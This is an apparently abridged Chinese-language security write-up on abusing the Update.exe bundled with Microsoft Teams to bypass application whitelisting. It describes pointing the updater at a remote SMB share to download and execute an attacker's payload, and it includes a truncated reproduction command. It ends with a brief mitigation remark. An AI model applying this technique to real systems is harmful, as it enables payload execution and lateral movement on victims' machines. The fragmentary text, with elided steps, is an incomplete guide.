Electron基本上是嵌入在可执行文件中的nodejs.让我们使用Microsoft Teams附带的Update.exe深入了解应用程序白名单绕过.
0x01分析:
首先,将Teams.exe...最初,当观察到这一发现时,发现它仍然可以用作横向移动的技术,但是,发现通过指向远程SMB共享可以轻松绕开添加的限制.
0x04合法事件:
%localappdata%\Microsoft\Teams\....看起来情况很复杂,路途漫长,但我们可以使其成功.
0x06 Remote Samba:
为了减少攻击步骤,攻击者可以创建远程共享,而不是本地共享.这将允许他们下载远程有效负载并执行,而不是尝试通过中间步骤将有效负载获取到本地共享...三、重现步骤:
转到受害者系统上的目标应用程序文件夹
“%localappdata%/ Microsoft / Teams /”
运行以下命令:
update.exe --update = [Samba...请求客户或IT寻求Microsoft Teams软件包放置的任何安全排除措施,并查看所应用的更改.